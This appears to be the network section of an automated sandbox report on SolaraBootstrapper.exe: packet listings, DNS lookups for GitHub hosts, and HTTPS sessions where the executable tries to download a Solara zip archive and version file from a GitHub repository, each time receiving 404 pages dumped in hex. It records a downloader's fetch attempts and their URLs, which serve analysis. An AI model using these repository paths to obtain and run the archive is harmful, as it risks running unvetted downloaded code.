                        Jan 7, 2025 16:05:20.515671968 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.515691996 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.515712023 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.515774012 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.515779972 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.516400099 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.516424894 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.516458035 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.516458035 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.516473055 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.516499996 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.517256021 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.517319918 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.517328978 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.547770023 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.547801018 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.547873020 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.547903061 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.548800945 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.555195093 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.555368900 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.555440903 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.555469036 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.607235909 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.607273102 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.607301950 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.607350111 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.607367992 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.607393980 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.607425928 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.607455015 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.607466936 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.607482910 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.607873917 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.607901096 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.607917070 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.607928038 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.607940912 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.608491898 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.608597040 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.608609915 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.609817982 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.609852076 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.609874964 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.609899044 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.609925032 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.609947920 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.610076904 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.610105038 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.610127926 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.610281944 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.610316992 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.610351086 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.610380888 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.610388994 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.610404015 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.611488104 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.611517906 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.611541986 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.611565113 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.611587048 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.611608982 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.611622095 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.611649036 CET44349706140.82.121.4192.168.2.5
                        Jan 7, 2025 16:05:20.611665010 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.611686945 CET49706443192.168.2.5140.82.121.4
                        Jan 7, 2025 16:05:20.613372087 CET49706443192.168.2.5140.82.121.4

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 7, 2025 16:05:17.138488054 CET5038253192.168.2.51.1.1.1
                        Jan 7, 2025 16:05:17.145312071 CET53503821.1.1.1192.168.2.5
                        Jan 7, 2025 16:05:18.850841045 CET5156753192.168.2.51.1.1.1
                        Jan 7, 2025 16:05:18.857755899 CET53515671.1.1.1192.168.2.5

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jan 7, 2025 16:05:17.138488054 CET192.168.2.51.1.1.10x7b28Standard query (0)github.comA (IP address)IN (0x0001)false
                        Jan 7, 2025 16:05:18.850841045 CET192.168.2.51.1.1.10x363Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jan 7, 2025 16:05:17.145312071 CET1.1.1.1192.168.2.50x7b28No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                        Jan 7, 2025 16:05:18.857755899 CET1.1.1.1192.168.2.50x363No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                        Jan 7, 2025 16:05:18.857755899 CET1.1.1.1192.168.2.50x363No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                        Jan 7, 2025 16:05:18.857755899 CET1.1.1.1192.168.2.50x363No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                        Jan 7, 2025 16:05:18.857755899 CET1.1.1.1192.168.2.50x363No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                        Jan 7, 2025 16:05:27.483938932 CET1.1.1.1192.168.2.50x7df4No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                        Jan 7, 2025 16:05:27.483938932 CET1.1.1.1192.168.2.50x7df4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.35A (IP address)IN (0x0001)false
                        Jan 7, 2025 16:05:27.483938932 CET1.1.1.1192.168.2.50x7df4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.39A (IP address)IN (0x0001)false
                        Jan 7, 2025 16:05:27.483938932 CET1.1.1.1192.168.2.50x7df4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.23A (IP address)IN (0x0001)false
                        Jan 7, 2025 16:05:27.483938932 CET1.1.1.1192.168.2.50x7df4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.18A (IP address)IN (0x0001)false
                        Jan 7, 2025 16:05:27.483938932 CET1.1.1.1192.168.2.50x7df4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.20A (IP address)IN (0x0001)false
                        Jan 7, 2025 16:05:27.483938932 CET1.1.1.1192.168.2.50x7df4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.19A (IP address)IN (0x0001)false
                        Jan 7, 2025 16:05:27.483938932 CET1.1.1.1192.168.2.50x7df4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.36A (IP address)IN (0x0001)false
                        Jan 7, 2025 16:05:27.483938932 CET1.1.1.1192.168.2.50x7df4No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.34A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • github.com
                        • raw.githubusercontent.com

                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.549704140.82.121.44431292C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                        TimestampBytes transferredDirectionData
                        2025-01-07 15:05:18 UTC105OUTGET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1
                        Host: github.com
                        Connection: Keep-Alive
                        2025-01-07 15:05:18 UTC473INHTTP/1.1 404 Not Found
                        Server: GitHub.com
                        Date: Tue, 07 Jan 2025 15:05:18 GMT
                        Content-Type: text/html; charset=utf-8
                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                        Cache-Control: no-cache
                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                        X-Frame-Options: deny
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 0
                        Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                        2025-01-07 15:05:18 UTC3391INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
                        2025-01-07 15:05:18 UTC1370INData Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 0a 20 20 3e 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73
                        Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns
                        2025-01-07 15:05:18 UTC1370INData Raw: 66 62 63 34 62 39 39 61 37 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 68 69 67 68 5f 63 6f 6e 74 72 61 73 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 68 69 67 68 5f 63 6f 6e 74 72 61 73 74 2d 63 66 66 31 63 39 62 32 37 62 31 61 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69
                        Data Ascii: fbc4b99a77.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-cff1c9b27b1a.css" /><link data-color-theme="dark_colorblind" crossorigi
                        2025-01-07 15:05:18 UTC1370INData Raw: 74 73 2f 70 72 69 6d 65 72 2d 34 34 33 30 64 33 63 32 63 31 35 30 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 67 6c 6f 62 61 6c 2d 31 64 33 34 34 30 65 39 34 36 64 64 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68
                        Data Ascii: ts/primer-4430d3c2c150.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-1d3440e946dd.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.gith
                        2025-01-07 15:05:18 UTC1370INData Raw: 6d 65 2d 33 31 38 66 66 37 31 30 34 35 63 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6f 64 64 62 69 72 64 5f 70 6f 70 6f 76 65 72 2d 70 6f 6c 79 66 69 6c 6c 5f 64 69 73 74 5f 70 6f 70 6f 76 65 72 5f 6a 73 2d 39 64 61 36 35 32 66 35 38 34 37 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69
                        Data Ascii: me-318ff71045cf.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-9da652f58479.js"></script><script crossori
                        2025-01-07 15:05:18 UTC1370INData Raw: 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6c 61 74 69 76 65 2d 74 69 6d 65 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 66 36 64 61 34 62 33 66 61 33 34 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 61 75 74 6f 2d 63 6f 6d 70 6c 65 74 65 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f
                        Data Ascii: e_modules_github_relative-time-element_dist_index_js-f6da4b3fa34c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_
                        2025-01-07 15:05:18 UTC1370INData Raw: 69 74 68 75 62 2d 65 6c 65 6d 65 6e 74 73 2d 66 39 39 31 63 66 61 62 35 31 30 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 33 62 35 33 36 32 64 33 64 34 30 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70
                        Data Ascii: ithub-elements-f991cfab5105.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-3b5362d3d402.js"></script><script crossorigin="anonymous" defer="defer" typ
                        2025-01-07 15:05:18 UTC1370INData Raw: 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 63 6f 6c 6f 72 2d 63 6f 6e 76 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 65 33 31 38 30 66 65 33 62 63 62 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f
                        Data Ascii: ymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://
                        2025-01-07 15:05:18 UTC1370INData Raw: 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 68 74 2d 38 33 63 32 33 35 2d 66 62 34 33 38 31 36 61 62 38 33 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73
                        Data Ascii: n/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-fb43816ab83c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javas
                        2025-01-07 15:05:18 UTC1370INData Raw: 31 32 63 37 31 31 33 31 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 6e 73 69 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 73 69 74 6f 72 2d 70 61 79 6c 6f 61 64 22 20 63 6f 6e 74 65 6e 74 3d 22 65 79 4a 79 5a 57 5a 6c 63 6e 4a 6c 63 69 49 36 62 6e 56 73 62 43 77 69 63 6d 56 78 64 57 56 7a 64 46 39 70 5a 43 49 36 49 6a 46 43 4d 44 49 36 4d 30 51 32 4d 45 59 31 4f 6a 4d 35 52 44 63 77 4e 6a 51 36 4d 30 49 7a 52 55 4e 42 51 6a 6f 32 4e 7a 64 45 4e 44 4a 42 52 43 49 73 49 6e 5a 70 63 32 6c 30 62 33 4a 66 61 57 51 69 4f 69 49 31 4d 54 59 32 4e 54 59 34 4d 6a 67 78 4d 6a 51 32 4d 7a 55 79 4d 44 51 32 49 69 77 69 63 6d 56 6e 61 57 39 75 58 32 56 6b 5a 32 55 69 4f 69 4a 6d 63 6d 45 69 4c 43 4a 79 5a 57 64 70 62 32 35 66 63
                        Data Ascii: 12c71131" data-turbo-transient="true" /><meta name="visitor-payload" content="eyJyZWZlcnJlciI6bnVsbCwicmVxdWVzdF9pZCI6IjFCMDI6M0Q2MEY1OjM5RDcwNjQ6M0IzRUNBQjo2NzdENDJBRCIsInZpc2l0b3JfaWQiOiI1MTY2NTY4MjgxMjQ2MzUyMDQ2IiwicmVnaW9uX2VkZ2UiOiJmcmEiLCJyZWdpb25fc


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.549705185.199.108.1334431292C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                        TimestampBytes transferredDirectionData
                        2025-01-07 15:05:19 UTC135OUTGET /quivings/Solara/main/Storage/version.txt HTTP/1.1
                        User-Agent: Solara
                        Host: raw.githubusercontent.com
                        Connection: Keep-Alive
                        2025-01-07 15:05:19 UTC803INHTTP/1.1 404 Not Found
                        Connection: close
                        Content-Length: 14
                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                        Strict-Transport-Security: max-age=31536000
                        X-Content-Type-Options: nosniff
                        X-Frame-Options: deny
                        X-XSS-Protection: 1; mode=block
                        Content-Type: text/plain; charset=utf-8
                        X-GitHub-Request-Id: B54A:3ACEAD:634088:6E9AF8:677D42AF
                        Accept-Ranges: bytes
                        Date: Tue, 07 Jan 2025 15:05:19 GMT
                        Via: 1.1 varnish
                        X-Served-By: cache-ewr-kewr1740040-EWR
                        X-Cache: MISS
                        X-Cache-Hits: 0
                        X-Timer: S1736262319.418474,VS0,VE28
                        Vary: Authorization,Accept-Encoding,Origin
                        Access-Control-Allow-Origin: *
                        Cross-Origin-Resource-Policy: cross-origin
                        X-Fastly-Request-ID: c77d44a0548b70c662ebc1f547d9827e16e6f190
                        Expires: Tue, 07 Jan 2025 15:10:19 GMT
                        Source-Age: 0
                        2025-01-07 15:05:19 UTC14INData Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64
                        Data Ascii: 404: Not Found


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.549706140.82.121.44431292C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                        TimestampBytes transferredDirectionData
                        2025-01-07 15:05:20 UTC81OUTGET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1
                        Host: github.com
                        2025-01-07 15:05:20 UTC473INHTTP/1.1 404 Not Found
                        Server: GitHub.com
                        Date: Tue, 07 Jan 2025 15:05:18 GMT
                        Content-Type: text/html; charset=utf-8
                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                        Cache-Control: no-cache
                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                        X-Frame-Options: deny
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 0
                        Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                        2025-01-07 15:05:20 UTC3387INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
